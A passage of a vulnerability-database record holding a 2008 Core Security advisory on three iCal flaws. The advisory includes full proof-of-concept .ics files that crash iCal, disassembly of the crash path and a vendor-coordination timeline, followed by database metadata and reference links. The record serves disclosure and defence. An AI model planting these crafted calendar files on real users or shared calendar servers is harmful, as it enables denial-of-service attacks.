crafted document\nfile with an editor that uses AppKit (e.g. TextEdit). \n\n4) Multiple unspecified errors exist in the processing of Pixlet\nvideo files. \n\n5) An unspecified error exists in Apple Type Services when processing\nembedded fonts in PDF files. This can be exploited to cause a memory\ncorruption when a PDF file containing a specially crafted embedded\nfont is printed. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\n6) An error in Safari\u0027s SSL client certificate handling can lead to\nan information disclosure of the first client certificate found in\nthe keychain when a web server issues a client certificate request. \n\n7) An integer overflow exists in CoreFoundation when handling CFData\nobjects. This can be exploited to cause a heap-based buffer overflow\nif an application calls \"CFDataReplaceBytes\" with an invalid \"length\"\nargument. \n\n8) An error due to an uninitialised variable in CoreGraphics can\npotentially be exploited to execute arbitrary code when a specially\ncrafted PDF is opened. \n\n9) A weakness is caused due to users not being warned before opening\ncertain potentially unsafe content types. \n\n10) An error when printing to password-protected printers with debug\nlogging enabled may lead to the disclosure of sensitive information. \n\n11) Some vulnerabilities in Adobe Flash Player can be exploited by\nmalicious people to bypass certain security restrictions, conduct\ncross-site scripting attacks, or to potentially compromise a user\u0027s\nsystem. \n\nFor more information:\nSA28083\n\n12) An integer underflow error in Help Viewer when handling\nhelp:topic URLs can be exploited to cause a buffer overflow when a \nspecially crafted help:topic URL is accessed. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\n13) A conversion error exists in ICU when handling certain character\nencodings. This can potentially be exploited bypass content filters\nand may lead to cross-site scripting and disclosure of sensitive\ninformation. \n\n14) Input passed to unspecified parameters in Image Capture\u0027s\nembedded web server is not properly sanitised before being used. This\ncan be exploited to disclose the content of local files via directory\ntraversal attacks. \n\n15) An error in the handling of temporary files in Image Capture can\nbe exploited by malicious, local users to manipulate files with the\nprivilege of a user running Image Capture. \n\n16) A boundary error in the BMP and GIF image decoding engine in\nImageIO can be exploited to disclose content in memory. \n\n17) Some vulnerabilities in ImageIO can be exploited by malicious\npeople to cause a DoS (Denial of Service). \n\nThe vulnerabilities are caused due to the use of vulnerable libpng\ncode. \n\nFor more information:\nSA27093\nSA27130\n\n18) An integer overflow error in ImageIO within the processing of\nJPEG2000 images can be exploited to cause a heap-based buffer\noverflow when a specially crafted JPEG2000 image is viewed. \n\nSuccessful exploitation of this vulnerability may allow execution of\narbitrary code. \n\n19) An error in Mail is caused due to an uninitialised variable and\ncan lead to disclosure of sensitive information and potentially\nexecution of arbitrary code when mail is sent through an SMTP server\nover IPv6. \n\n20) A vulnerability in Mongrel can be exploited by malicious people\nto disclose sensitive information. \n\nFor more information:\nSA28323\n\n21) The sso_util command-line tool requires that passwords be passed\nto it in its arguments, which can be exploited by malicious, local\nusers to disclose the passwords. \n\n22) An error in Wiki Server can be exploited to determine valid local\nuser names when nonexistent blogs are accessed. \n\nORIGINAL ADVISORY:\nhttp://support.apple.com/kb/HT1897\n\nOTHER REFERENCES:\nSA18008:\nhttp://secunia.com/advisories/18008/\n\nSA18307:\nhttp://secunia.com/advisories/18307/\n\nSA26273:\nhttp://secunia.com/advisories/26273/\n\nSA26636:\nhttp://secunia.com/advisories/26636/\n\nSA27093:\nhttp://secunia.com/advisories/27093/\n\nSA27130:\nhttp://secunia.com/advisories/27130/\n\nSA28081:\nhttp://secunia.com/advisories/28081/\n\nSA28083:\nhttp://secunia.com/advisories/28083/\n\nSA28323:\nhttp://secunia.com/advisories/28323/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs/\n\nMultiple vulnerabilities in iCal\n\n\n*Advisory Information*\n\nTitle: Multiple vulnerabilities in iCal\nAdvisory ID: CORE-2008-0126\nAdvisory URL: http://www.coresecurity.com/?action=item\u0026id=2219\nDate published: 2008-05-21\nDate of last update: 2008-05-21\nVendors contacted: Apple Inc. \nRelease mode: Coordinated release\n\n\n*Vulnerability Information*\n\nClass: Input Validation\nRemotely Exploitable: Yes (client-side)\nLocally Exploitable: No\nBugtraq ID: 28629 28632 28633\t\nCVE Name: CVE-2008-1035 CVE-2008-2006 CVE-2008-2007\t\n\n\n*Vulnerability Description*\n\niCal is a personal calendar application from Apple Inc. The calendar application can be used as a\nstand-alone application or as a client-side component to calendar server\nthat lets users create and share multiple calendars and subscribe to\nother user\u0027s calendars. Apple\u0027s iCal uses the iCalendar standard for its\ncalendar file format (which uses the \u0027.ics\u0027 filename extension) [1] and\nthe CalDAV protocol for calendar sharing [2]. There is a growing number\nof web sites providing calendars files and open subscription to calendar\nupdates [3][4][5]. \n\n The other two vulnerabilities lead to abnormal termination (crash) of\nthe iCal application due to null-pointer dereference bugs triggered\nwhile parsing a malformed \u0027.ics\u0027 files. \n\n Exploitation of these vulnerabilities in a client-side attack scenario\nis possible with user assistance by opening or clicking on specially\ncrafted \u0027.ics\u0027 file send over email or hosted on a malicious web server;\nor without direct user assistance if a would-be attacker has the ability\nto legitimately add or modify calendar files on a CalDAV server. \n\n\n*Vulnerable Packages*\n\n. iCal version 3.0.1 on MacOS X 10.5.1 (Leopard). \n\n\n*Non-vulnerable Packages*\n\n. Available through Apple security updates (see vendor information below). \n\n\n*Vendor Information, Solutions and Workarounds*\n\nThe following information was provided by the vendor:\n\n Availability\n\n Apple security updates are available via the Software Update mechanism:\nhttp://support.apple.com/kb/HT1338\n\n Apple security updates are also available for manual download via:\nhttp://www.apple.com/support/downloads/\n\n Cross-References\n\n If you provide cross-referencing information in your advisory please\nlink to the following URL: http://support.apple.com/kb/HT1222\n\n\n*Credits*\n\nThese vulnerabilities were discovered and researched by Rodrigo\nCarvalho, from the Core Security Consulting Services (SCS) team of Core\nSecurity Technologies during Bugweek 2007. Additional research was done\nby Ricardo Narvaja from CORE IMPACT the Exploit Writers Team (EWT). \n\n A client-side attack directed to the end-users of the iCal application\ncan be executed by sending an email with a malicious .ics file\nattachment, by hosting a malicious .ics file on web site and directing\nusers to open it or by injecting a malicous .ics file on a CalDAV\nenabled server to which potential victims are subscribed to update their\ncalendars automatically. In the three reported cases the vulnerabilities\narise from improper validation of input while or after parsing of the\ncalendar file format. \n\n 1) Null pointer de-reference #1 (Bugtraq ID 28629, CVE-2008-2006)\n\n Improper sanitization of integer input may lead to null pointer\ndereference and possibly to an application that loses control of its\nexecution, resulting in a denial of service. \n\n A vulnerable .ics file will contain the following line:\n\n/-----------\n\n RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646\n\n- -----------/\n\n The \u0027COUNT\u0027 value causes an integer overflow, which leads to a null\npointer dereference when iCal tries to use it after the .ics file is\nimported. \n\n The following Proof of Concept (PoC) file is provided to demonstrate\nits feasibility, to trigger the bug import a .ics file with the\nfollowing content and then select one of the created events. \n\n/-----------\n\nBEGIN:VCALENDAR\nX-WR-TIMEZONE:America/Buenos_Aires\nPRODID:-//Apple Inc.//iCal 3.0//EN\nCALSCALE:GREGORIAN\nX-WR-CALNAME: Vulnerable\nVERSION:2.0\nX-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5\nMETHOD:PUBLISH\nBEGIN:VTIMEZONE\nTZID:America/Buenos_Aires\nBEGIN:DAYLIGHT\nTZOFFSETFROM:-0300\nTZOFFSETTO:-0300\nDTSTART:19991003T000000\nRDATE:19991003T000000\nTZNAME:ARST\nEND:DAYLIGHT\nBEGIN:STANDARD\nTZOFFSETFROM:-0300\nTZOFFSETTO:-0300\nDTSTART:20000303T000000\nRDATE:20000303T000000\nRDATE:20001231T210000\nTZNAME:ART\nEND:STANDARD\nEND:VTIMEZONE\nBEGIN:VEVENT\nSEQUENCE:4\nDTSTART;TZID=America/Buenos_Aires:20071225T110000\nDURATION:PT1H\nUID:48878014-5F03-43E5-8639-61E708714F9A\nDTSTAMP:20071213T130632Z\nSUMMARY:Vuln\nCREATED:20071213T130611Z\nRRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646\nEND:VEVENT\nEND:VCALENDAR\n\n- -----------/\n\n Analysis of the vulnerability\n\n The above proof-of-concept file creates new events in the iCal\napplication . When a user double-clicks on these events the program\ncrashes writing in the memory pointed by pointer \u0027EDI=0\u0027. Only the value\nof \u0027EAX\u0027 is under control, must be less than \u00270x7fffffff\u0027 and is\nextracted from the following line of the PoC \u0027.ics\u0027 file. \n\n/-----------\n\nRRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 (0x7FFFFFFE)\n- -----------/\n\n\n\n/-----------\n\n__text:0013C178 push ebp\n__text:0013C179 mov ebp, esp\n__text:0013C17B sub esp, 38h\n__text:0013C17E mov eax, ds:off_1F435C\n__text:0013C183 mov [ebp+var_4], edi\n__text:0013C186 mov edi, [ebp+arg_C]\n__text:0013C189 mov [ebp+var_8], esi\n__text:0013C18C mov esi, [ebp+arg_8]\n__text:0013C18F mov [ebp+var_C], ebx\n__text:0013C192 mov [esp+38h+var_34], eax\n__text:0013C196 mov eax, [ebp+arg_0]\n__text:0013C199 mov [esp+38h+var_28], 0\n__text:0013C1A1 mov [esp+38h+var_2C], 0\n\n- -----------/\n\n Here is written on \u0027[ebp + var28]\u0027 and \u0027[ebp + var2C]\u0027 and because\n\u0027EBP\u0027 is \u0027ESP\u0027 minus \u00270x38\u0027, this is similar to\n\n/-----------\n\n[ebp + var28] = [esp+0x38+var_28]\n[ebp + var2C] = [esp+0x38+var_2C]\n\n- -----------/\n\n There are located the null-pointers on the stack. \n\n/-----------\n\nBFFFEF7C var_2C dd 0\nBFFFEF80 var_28 dd 0\n\n- -----------/\n\n Upon reaching the function where the crash occurs. \n\n/-----------\n\n__text:0014ADC3 push ebp\n__text:0014ADC4 mov ebp, esp\n__text:0014ADC6 sub esp, 48h\n__text:0014ADC9 mov eax, ds:stru_1FA2A0.superclass\n\n- -----------/\n\n Logically the zeros are still present because don\u0027t work with those\nvalues until we enter. \n\n/-----------\n\nBFFFEF7C arg_C dd 0\nBFFFEF80 arg_10 dd 0\n\n- -----------/\n\n We see that the function argument \u0027arg_C\u0027 is loaded and moved to \u0027EDI\u0027. \n\n/-----------\n\n0014ADE0 mov edi, [ebp+arg_C]\n\n- -----------/\n\n And this is the location where is written at the moment of crashing\nfurther ahead, meaning that it is a zero that can\u0027t be changed. \n\n/-----------\n\n0014AE2F mov dword ptr [edi], 0\n\n- -----------/\n\n When getting closer to the point of crash because we control \u0027EAX\u0027 and\nwe can trigger a jump after comparing with \u0027[ebx+0Ch]\u0027 and \u0027[ebx+08h]\u0027. \n\n/-----------\n\n0014AE20 cmp eax, [ebx+0Ch] (if it is lower than 1)\n0014AE23 jl short loc_14AE2F\n\n0014AE25 cmp eax, [ebx+8] (if it is lower than 0x270F)\n0014AE2D jle short loc_14AE37\n\n\n169280B8 dd 270Fh (ebx+08)\n169280BC dd 1\t \t (ebx+0C)\n\n- -----------/\n\n The first comparison for \u0027JL\u0027 doesn\u0027t avoid the crash zone, but anyway\nnegative numbers can\u0027t be inserted by default and a zero value does not\ncrash the program or even gets it near the critical zone. Any other\nvalue crashes the application when writing in the null location. \n\n In the other case a comparison is made such that if \u0027EAX\u0027 is less than\n\u00270x270f\u0027 the crash zone is avoided and the program continues to work\nwithout problem. Negative values are not read and if a value greater\nthan \u00270x7fffffff\u0027 the maximum value is used instead. \n\n 2) Null pointer dereference #2 (Bugtraq ID 28632, CVE-2008-2006)\n\n A vulnerable .ics file will contain the following line:\n\n/-----------\n\nTRIGGER:-PT65535H\n\n- -----------/\n\n The \u0027TRIGGER\u0027 value causes a null pointer dereference when iCal tries\nto use it after the .ics file is imported. \n\n The corresponding PoC follows. to trigger the bug import a .ics file\nwith the following content then click on the 65535 on edit mode and\naccept it without changes. \n\n/-----------\n\nBEGIN:VCALENDAR\nX-WR-CALNAME:Fake event\nPRODID:-//Apple Inc.//iCal 3.0//EN\nCALSCALE:GREGORIAN\nVERSION:2.0\nMETHOD:PUBLISH\nBEGIN:VTIMEZONE\nTZID:America/Buenos_Aires\nBEGIN:DAYLIGHT\nTZOFFSETFROM:-0300\nTZOFFSETTO:-0300\nDTSTART:19991003T000000\nRDATE:19991003T000000\nTZNAME:ARST\nEND:DAYLIGHT\nBEGIN:STANDARD\nTZOFFSETFROM:-0300\nTZOFFSETTO:-0300\nDTSTART:20000303T000000\nRDATE:20000303T000000\nRDATE:20001231T210000\nTZNAME:ART\nEND:STANDARD\nEND:VTIMEZONE\nBEGIN:VEVENT\nSEQUENCE:10\nDTSTART;TZID=America/Buenos_Aires:20071225T000000\nDTSTAMP:20071213T124414Z\nSUMMARY:Fake Event\nDTEND;TZID=America/Buenos_Aires:20071225T010000\nRRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1\nUID:651D31BE-455E-45ED-99C6-55B9F03A3FA9\nTRANSP:OPAQUE\nCREATED:20071213T124215Z\nBEGIN:VALARM\nX-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49\nACTION:DISPLAY\nDESCRIPTION:Event reminder\nTRIGGER:-PT65535H\nEND:VALARM\nEND:VEVENT\nEND:VCALENDAR\n\n- -----------/\n\n 3) Improper resource liberation (Bugtraq ID 28633, CVE-2008-2007)\n\n This is another case of bad validation of a file with the iCalendar\nformat that results in a more serious bug. \n\n A vulnerable .ics file will contain the following line:\n\n/-----------\n\nATTACH;VALUE=URI:S=osumi\n\n- -----------/\n\n The corresponding PoC follows. Double-click on the .ics file with the\nfollowing content, an event will be created. To crash iCal click on the\nnewly created event and the on the alarm sound list. \n\n/-----------\n\nBEGIN:VCALENDAR\nX-WR-TIMEZONE:America/Buenos_Aires\nPRODID:-//Apple Inc.//iCal 3.0//EN\nCALSCALE:GREGORIAN\nX-WR-CALNAME:evento falso\nVERSION:2.0\nX-WR-RELCALID:71CE8EAD-380B-4EA3-A123-60F9B2A03990\nMETHOD:PUBLISH\nBEGIN:VTIMEZONE\nTZID:America/Buenos_Aires\nBEGIN:DAYLIGHT\nTZOFFSETFROM:-0300\nTZOFFSETTO:-0300\nDTSTART:19991003T000000\nRDATE:19991003T000000\nTZNAME:ARST\nEND:DAYLIGHT\nBEGIN:STANDARD\nTZOFFSETFROM:-0300\nTZOFFSETTO:-0300\nDTSTART:20000303T000000\nRDATE:20000303T000000\nRDATE:20001231T210000\nTZNAME:ART\nEND:STANDARD\nEND:VTIMEZONE\nBEGIN:VEVENT\nSEQUENCE:11\nDTSTART;TZID=America/Buenos_Aires:20071225T000000\nDTSTAMP:20071213T143420Z\nSUMMARY:evento falso\nDTEND;TZID=America/Buenos_Aires:20071225T010000\nLOCATION:donde se hace\nRRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1\nTRANSP:OPAQUE\nUID:651D31BE-455E-45ED-99C6-55B9F03A3FA9\nURL;VALUE=URI:http://pepe.com:443/pepe\nATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2\n0-449C-88E7-744E62BC8C12/651D31BE-455E-45ED-99C6-55B9F03A3FA9/popote.php\n\nCREATED:20071213T142720Z\nCREATED:20071213T124215Z\nBEGIN:VALARM\nX-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49\nACTION:DISPLAY\nDESCRIPTION:Event reminder\nTRIGGER:-PT15H\nEND:VALARM\nBEGIN:VALARM\nX-WR-ALARMUID:F54A0E05-57B8-4562-8E77-056B19305CD0\nACTION:AUDIO\nTRIGGER:-PT15M\nATTACH;VALUE=URI:S=osumi\nEND:VALARM\nEND:VEVENT\nEND:VCALENDAR\n\n- -----------/\n\n\n\n\n*Report Timeline*\n\n. 2008-01-30:\n Core sends an initial notification that vulnerabilities were\ndiscovered in the iCal application and iCal server and that an advisory\ndraft is available. 2008-01-31:\n Vendor acknowledges and requests the draft. 2008-01-31:\n Core sends the draft, including proof-of-concept files that trigger\nthe bugs. 2008-02-12:\n Core requests update info on the vulnerabilities and states that\nwants to coordinate the date of the disclosure. 2008-02-18:\n Core requests update info on the vulnerabilities. 2008-02-18:\n Vendor replies that the iCal Server (CVE-2008-1000) vulnerability is\ntracked for a fix in an upcoming update and the vulnerabilities in the\niCal client application will be fixed in an update following the early\nMarch software update. 2008-02-19:\nCore indicated that it will split the report in two security advisories. \nCORE-2008-0123 will address the vulnerability in iCal server\n(CVE-2008-1000) and will be published in coordination with the release\nof the vendor\u0027s March software update. The publication date for the\nsecond advisory, will dealt bydealing with the three vulnerabilities in\nthe iCal client application will be coordinated for a date after the\nMarch update unless there are clear indications of the vulnerability\nbeing exploited in the wild, in which case if Core considers that the\ninformation provided in the advisory would help end users to decide how\nto react the advisory would be published sooner as a \"forced release\". 2008-03-03:\nCore requests update info on the vulnerability, a concrete release\nschedule and text for the advisory section called \"Vendor Information,\nSolutions and Workarounds\". 2008-03-04:\n Vendor provides information concerning CVE-2008-1000 and indicates\nthat the bug is in the Wiki server and not the iCal Server. 2008-03-13:\nCore re-schedules the publication to March 24th and requests the vendor\nan update on the coordinated date of disclosure. The remaining three\nvulnerabilities in the iCal client application will be dealt by a second\nsecurity advisory (CORE-2008-0126) to be published after the release of\nthe March software update. Publication of CORE-2008-0126 is initially\nslated for March 24th 2008 but the final date estimation can be\ndiscussed further with the vendor based on its estimated date for fixes. 2008-03-18:\n APPLE-SA-2008-0318 software update released. 2008-03-18:\n CORE-2008-0123 is published. 2008-03-18:\nVendor informs that will track the first two issues as crasher-only\nbugs but still intends to address them. Further details to determine if\nthe null pointer de-reference bugs are exploitable are requested. The\nvendor will continue to track the third as a security bug and estimates\nearly April for the release of the software update that fix them. \nAdditional timing information will be provided closer to the estimated date. 2008-03-18:\n Core re-schedules the publication to April 7th and indicates that\nshould any new details about the vulnerabilities become available they\nwill be forwarded to the vendor. 2008-04-04:\nCore requests a more precise date of release of the fixes to coordinate\nthe publication and recommends the vendor to consider the three as\nsecurity bugs because it couldn\u0027t be proved that in this case the\ninteger overflows can\u0027t be exploited. 2008-04-07:\n Vendor requests that Core to postpone the advisory publication until\nthe fix is available. 2008-04-07:\n Core requests a more precise date of release of the fixes to coordinate\nthe new publication date. 2008-04-07:\n Vendor informs that the estimated date for the update is near the end\nof April. 2008-04-08:\n Core confirms that coordinating the publication of CORE-2008-0126 for\nApril 28th is acceptable. 2008-04-16:\n Core requests an update on the release date of the fixes. 2008-04-17: Vendor states that end of April is still the estimated\ndate and provides more details that explain why the first two bugs are\nbeen considered null-pointer dereference bugs only. A value range\nverification is performed and out-of-range values branch execution flow\nto instructions that assign NULL to a pointer which later triggers a\nnull pointer de-reference that causes the application to crash. the root\ncause of the crash is a NULL pointer de-reference and not an integer\noverflow. 2008-04-17:\n Core confirms that the two first bugs can be considered crashes due to\nnull-pointer dereference. Upon further research it is confirmed that\ninteger overflows are detected and do not cause the actual crashes. 2008-04-17:\n Vendor asks confirmation that the first two bugs have no security\nrelated consequences. 2008-04-17:\n Core responds that the three bugs still have security related\nconsequences. The first two bugs can be abuse to execute denial of\nservice attacks by untrusted and unauthenticated third parties\nspecifically using public server as attack vector. Core considers bug\nthat allow unauthenticated third parties to be security vulnerabilities. \nCore indicates that exploitation of null pointer de-reference bugs\ncannot be ruled out generically, a statement which could be derived from\nRice\u0027s theorem. 2008-04-25: Core requests an update on the release date of the fixes\nand sends detailed information on the analysis of the first bug. 2008-04-27: Vendor estimates early May as the date of the software\nfixes release. 2008-05-05: Core informs the vendor that it\u0027s re-scheduling the\npublication to May 12th as a final date unless precise information is\ngiven on the release date of the fixes. 2008-05-06: Vendor responds precising that the fixes are being\nreleased sometime the following week. 2008-05-07: Core states that it is not willing to re-schedule\npublication date unless the vendor commits to a concrete date. 2008-05-10: Vendor asks Core not to publish the advisory before Apple\nsecurity update is available. Vendor indicates that fixes will be\nreleased on May 19th, 2008. 2008-05-10: Given that the vendor has communicated a concrete date,\nCore will discuss re-scheduling (for the fifth time) the publication\ndate of the advisory. 2008-05-12: Core communicates the vendor that the publication of the\nadvisory is re-scheduled to May 21th, that date is final. 2008-05-14: Vendor acknowledges reception of the last email and\nappreciates that Core posponed the advisory publication date. 2008-05-20: Core send the final draft of the advisory to the vendor. 2008-05-21:\n An edited and corrected final version of the advisory is sent to the\nvendor. 2008-05-21: Advisory CORE-2008-0126 is published. \n\n\n\n*References*\n\n[1]\n RFC 2445: Internet Calendaring and Scheduling Core Object\nSpecification (iCalendar) - http://tools.ietf.org/html/rfc2445\n[2] RFC 4791: Calendaring Extensions to WebDAV -\n http://tools.ietf.org/html/rfc4791\n[3] http://www.apple.com/downloads/macosx/calendars/\n[4] iCalShare http://icalshare.com/\n[5] iCalWorld http://www.icalworld.com/\n\n\n*About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs/. \n\n\n*About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company\u0027s flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com. \n\n\n*Disclaimer*\n\nThe contents of this advisory are copyright (c) 2008 Core Security\nTechnologies and (c) 2008 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given. \n\n\n*GPG/PGP Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niD8DBQFINH0iyNibggitWa0RAtdmAKCf4V+tks7RBYRRa2Bp9IT3LjBoQgCfeff8\nPZO21gkXaFO1pAdxuViw2ys=\n=xZCy\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1035"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-001405"
},
{
"db": "BID",
"id": "29412"
},
{
"db": "BID",
"id": "29486"
},
{
"db": "VULHUB",
"id": "VHN-31160"
},
{
"db": "PACKETSTORM",
"id": "66818"
},
{
"db": "PACKETSTORM",
"id": "66804"
},
{
"db": "PACKETSTORM",
"id": "66599"
}
],
"trust": 2.52
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-31160",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31160"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-1035",
"trust": 2.9
},
{
"db": "BID",
"id": "29412",
"trust": 2.8
},
{
"db": "BID",
"id": "29486",
"trust": 2.8
},
{
"db": "USCERT",
"id": "TA08-150A",
"trust": 2.6
},
{
"db": "SECUNIA",
"id": "30430",
"trust": 2.6
},
{
"db": "BID",
"id": "28633",
"trust": 2.5
},
{
"db": "SECTRACK",
"id": "1020095",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2008-1601",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2008-1697",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1020138",
"trust": 0.8
},
{
"db": "USCERT",
"id": "SA08-150A",
"trust": 0.8
},
{
"db": "XF",
"id": "42716",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2008-001405",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200806-030",
"trust": 0.7
},
{
"db": "CERT/CC",
"id": "TA08-150A",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20080521 CORE-2008-0126: MULTIPLE VULNERABILITIES IN ICAL",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20080528 RE: CORE-2008-0126: MULTIPLE VULNERABILITIES IN ICAL",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20080527 RE: CORE-2008-0126: MULTIPLE VULNERABILITIES IN ICAL",
"trust": 0.6
},
{
"db": "APPLE",
"id": "APPLE-SA-2008-05-28",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "66599",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "31620",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-84940",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-31160",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "66818",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "66804",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31160"
},
{
"db": "BID",
"id": "29412"
},
{
"db": "BID",
"id": "29486"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-001405"
},
{
"db": "PACKETSTORM",
"id": "66818"
},
{
"db": "PACKETSTORM",
"id": "66804"
},
{
"db": "PACKETSTORM",
"id": "66599"
},
{
"db": "CNNVD",
"id": "CNNVD-200806-030"
},
{
"db": "NVD",
"id": "CVE-2008-1035"
}
]
},
"id": "VAR-200805-0584",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-31160"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T20:14:19.047000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Mac OS X 10.5.3",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT1897"
},
{
"title": "Mac OS X 10.5.3",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT1897?viewlocale=ja_JP"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-001405"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-94",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31160"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-001405"
},
{
"db": "NVD",
"id": "CVE-2008-1035"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/28633"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/29412"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/29486"
},
{
"trust": 2.5,
"url": "http://www.us-cert.gov/cas/techalerts/ta08-150a.html"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/30430"
},
{
"trust": 1.7,
"url": "http://lists.apple.com/archives/security-announce/2008//may/msg00001.html"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1020095"
},
{
"trust": 1.7,
"url": "http://www.coresecurity.com/?action=item\u0026id=2219"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnta08-150a/"
},
{
"trust": 1.4,
"url": "http://www.frsirt.com/english/advisories/2008/1601"
},
{
"trust": 1.4,
"url": "http://www.frsirt.com/english/advisories/2008/1697"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/492414/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/492638/100/100/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/492682/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2008/1601"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2008/1697"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1035"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/42716"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-1035"
},
{
"trust": 0.8,
"url": "http://securitytracker.com/id?1020138"
},
{
"trust": 0.8,
